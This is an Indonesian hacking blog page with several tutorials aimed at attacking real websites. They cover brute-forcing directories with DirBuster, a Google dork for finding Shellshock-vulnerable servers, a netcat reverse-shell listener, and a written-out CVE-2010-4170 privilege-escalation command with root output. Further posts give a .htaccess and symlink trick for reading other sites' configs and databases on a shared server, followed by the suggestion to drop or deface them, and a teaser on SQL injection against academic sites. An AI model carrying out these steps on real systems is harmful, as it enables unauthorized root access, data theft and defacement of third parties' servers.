LinuxSec Exploit

Nothing is Ever Locked

Hacking

Directory Traversal Attack Menggunakan DirBuster

by Jack Wilder 3 Comments

Kali ini saya akan menulis mengenai Directory Traversal Attack.Ini adalah jenis serangan bruteforce yang memnungkinkan penyerang untuk mendapatkan struktur direktori dan file pada web target, untuk selanjutnya dianalisa celah atau exploit yang digunakan.

Nah untuk saya sendiri biasanya menggunakan DirBuster untuk melakukan Directory Traversal Attack. Biasanya saya gunakan untuk menemukan file uploader atau admin login.

DirBuster sendiri merupakan project dari OWASP, dibuat menggunakan bahasa pemrograman Java dan digunakan untuk melakukan bruteforce direktori tersembunyi serta file dari web yang tidak seharusnya dipublikasikan.
Fitur dari DirBuster :
  1. Multi threaded has been recorded at over 6000 requests/sec
  2. Works over both http and https
  3. Scan for both directory and files
  4. Will recursively scan deeper into directories it finds
  5. Able to perform a list based or pure brute force scan
  6. DirBuster can be started on any directory
  7. Custom HTTP headers can be added
  8. Proxy support
  9. Auto switching between HEAD and GET requests
  10. Content analysis mode when failed attempts come back as 200
  11. Custom file extensions can be used
  12. Performance can be adjusted while the program in running
  13. Supports Basic, Digest and NTLM auth
  14. Command line * GUI interface

Untuk tools nya bisa kalian download disini :
Di dalamnya juga sudah ada file berisi wordlist dari nama direktori dan file.
  • directory-list-2.3-small.txt – (87650 words) – Directories/files that where found on at least 3 different hosts
  • directory-list-2.3-medium.txt – (220546 words) – Directories/files that where found on at least 2 different hosts
  • directory-list-2.3-big.txt – (1273819 words) – All directories/files that where found
  • directory-list-lowercase-2.3-small.txt – (81629 words) – Case insensitive version of directory-list-2.3-small.txt
  • directory-list-lowercase-2.3-medium.txt – (207629 words) – Case insensitive version of directory-list-2.3-medium.txt
  • directory-list-lowercase-2.3-big.txt – (1185240 words) – Case insensitive version of directory-list-2.3-big.txt
  • directory-list-1.0.txt – (141694 words) – Original unordered list
  • apache-user-enum-1.0.txt – (8916 usernames) – Used for guessing system users on apache with the userdir module enabled, based on a username list I had lying around (unordered)
  • apache-user-enum-2.0.txt – (10341 usernames) – Used for guessing system users on apache with the userdir module enabled, based on ~XXXXX found during list generation (Ordered)

Cara menggunakannya cukup mudah, setelah di ekstrak, masuk ke direktori DirBuster-nya, lalu masukkan command berikut di terminal :

java -jar DirBuster-0.12.jar

Nah setelah DirBuster terbuka, masukkan target dan juga port nya (jika port dari server berada di port khusus seperti 1337 dll. Jangan lupa pilih jenis wordlist yang ingin digunakan.
Lalu tinggal tunggu tools ini bekerja.
Lamanya proses scan tergantung koneksi kalian dan bagus tidaknya respon dari server target.
DirBuster sendiri merupakan tools yang bisa disebut memudahkan kita untuk melakukan information gathering pada server target, yang tentu saja memudahkan kita nantinya untuk menemukan exploit apa yang cocok digunakan di server tersebut.
Oke sekian tutorial dan share kali ini, semoga bermanfaat, jangan lupa subscribe. 😀

From Shellshock Exploit to Server Full Root Acces

by Jack Wilder Leave a Comment

Sebenarnya Shellshock Exploit ini termasuk exploit lama. Saya kenal exploit ini di 2014 lalu. Namun beberapa hari belakangan ini kembali ramai semenjak teman teman dari IndoXploit Coders membuat tools autoexploit untuk bug ini, apalagi yang lebih menarik adalah rata rata yang vuln oleh exploit ini adalah server tua dimana kita bisa mendapat hak akses penuh alias id “root” di server yang kita retas tersebut.

Seperti screenshot diatas, kita benar benar mendapatkan akses root diserver target.
Dork : 
intext:”Sun Microsystems, Inc. All rights reserved.” inurl:/cgi-bin/
use your brain bitch!
Tools : 
Shellshock Autoexploit Tool
Nah, setelah kalian mendapatkan web atau server yang dirasa vuln, kita bisa melakukan exploit shellshock nya.
Pertama dari VPS ( atau dari ip statis jika kalian punya ), kita lakukan back connect dengan memasukkan command 

nc -l 1337 

( 1337 adalah port yang akan kita buka, silahkan tentukan sendiri bebas )
Setelah itu dari tool autoexploitnya kita masukkan url target, ip dari VPS / ip publik kita, dan juga port yang kita gunakan untuk back connect tadi. Tools ini sendiri otomatis akan melakukan reverse shell sehingga kita akan mendapatkan bash shell dari server target di vps kita.
Pertama kita cek dulu di versi kernel nya.

uname -a

Seperti yang saya katakan sebelumnya bahwa rata rata yang bakal vuln adalah server tua ( rata rata adalah 2010) , maka kita bisa melakukan previlege escalation disini memanfaatkan bug CVE-2010-4170.
Lihat detail exploitnya disini :
https://www.exploit-db.com/exploits/15620/
https://rhn.redhat.com/errata/RHSA-2010-0894.html

[[email protected] tmp]$ printf “install uprobes /bin/sh” > exploit.conf; MODPROBE_OPTIONS=”-C exploit.conf” staprun -u
 whatever
echo ” hacked by yzrinori “; uname -rv; whoami; id
 hacked by yzrinori
2.6.18-194.el5 #1 SMP Fri Apr 2 14:58:14 EDT 2010
root
uid=0(root) gid=0(root) groupes=500(ttaserv)

Nah bagi yang masih bingung, kalian bisa pelajari tentang manual exploit untuk shellshock sendiri disini :
http://exploit.linuxsec.org/2015/05/shellshock-vulnerability-exploit-on.html
Cukup sekian share kali ini, semoga bermanfaat, jangan lupa subscribe untuk mendapat tutorial terbaru.
Credit :
indoxploit.or.id – linuxsec.org

Simple Bypass Internal Server Error Symlink 2016

by Jack Wilder 16 Comments

Sebenarnya trik ini lumayan simpel dan sudah banyak yang tau. Namun malah jarang yang share. Cara melakukan bypass Internal Server Error saat melakukan symlink website. Sehingga nantinya kita tetap bisa melihat isi konfigurasi dari web tetangga. 😀

Oke, jadi saya anggap kalian sudah tanam shell, siap symlink, dan dipastikan web nya bisa di symlink.

Namun ketika di klik symlink terdapat pesan Internal Server Error.
Cara bypass nya cukup simple.
Pertama, buat folder baru. terserah kasih nama apa.
Disini saya membuat folder dengan nama ‘ linuxsec ‘.
Nah, masuk ke direktori ‘linuxsec’ , lalu buat file .htaccess dengan isi berikut :
Options Indexes FollowSymLinks
DirectoryIndex linuxsec.htm
AddType txt .php
AddHandler txt .php
Selanjutnya , di shell command masukkan perintah berikut :

ln -s / shu

Perintah ini untuk membuat symbolic link dari folder root ( / ) , ke folder shu .
Dan coba kita buka folder ” linuxsec/shu ” di browser. Sesuaikan dengan nama folder yang kalian buat dan folder symlink nya.
Nah.. tapi pas dibuka folder home, dimana folder tersebut berisi user user dari web satu server , masih forbidden .
Cara mengatasi nya, kalian lihat pola di shell nya.
Dalam kasus saya, web akan diletakkan di /home/$user/public_html/
Dan seperti percobaan symlink yang pertama, dimana kita mendapat notice Internal Server Error, tentu kita juga sudah tau username nya.
Tinggal diganti $user dengan username situs yang ingin kita ‘telanjangi’ .
Cek database nya..
Nah sekarang terserah mau diapain. Mau di drop apa di deface .
Oke sekian tutorial kali ini, semoga bermanfaat.

Base64 SQL Injection pada Situs Akademik Indonesia

by Jack Wilder 13 Comments

Tadi malam iseng jalan jalan di salahsatu grup underground terkenal di Indonesia, dan ada yang share ‘bug’ SQLi base64 pada banyak situs akademik (ac.id). Query nya pun hampir sama semua. Sehingga saat kalian menemukan situs yang memiliki celah ini, cukup memasukkan ‘exploit’ nya , dan isi database akan kelihatan.
[Read more…] about Base64 SQL Injection pada Situs Akademik Indonesia

Powered by WordPress and Genesis Framework. Style by LinuxSec.